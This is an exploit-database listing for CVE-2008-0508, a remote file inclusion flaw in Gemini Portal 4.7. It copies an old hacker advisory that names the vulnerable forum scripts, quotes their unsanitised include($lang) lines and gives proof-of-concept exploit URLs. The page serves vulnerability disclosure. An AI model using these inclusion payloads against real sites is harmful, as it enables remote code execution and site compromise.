The Gemini Portal (lang) Remote File Inclusion Vulnerabilities
CVE
Category
Price
Severity
CVE-2008-0508
CWE-73
$500
High
Author
Risk
Exploitation Type
Date
DarkFig
High
Remote
2008-10-31
CPE PURL
cpe:cpe:/a:gemini_portal:gemini_portal
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008100246 Below is a copy: [~] The Gemini Portal Multiple Remote File inj.
[~]
[~] version: 4.7
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 26.09.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] contact: [email protected]
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------
file 1: gemini/page/forums/bottom.php
c0de:
include($lang); (line16)
Exploit 1:
http://localhost/script_path/gemini/page/forums/bottom.php?lang=ZoRLu.txt?
file 2: gemini/page/forums/category.php
c0de:
include($lang); (line 17)
Exploit 2:
http://localhost/script_path/gemini/page/forums/category.php?lang=ZoRLu.txt?
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
[~]
[~] yildirimordulari.org & r00tsecurity.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum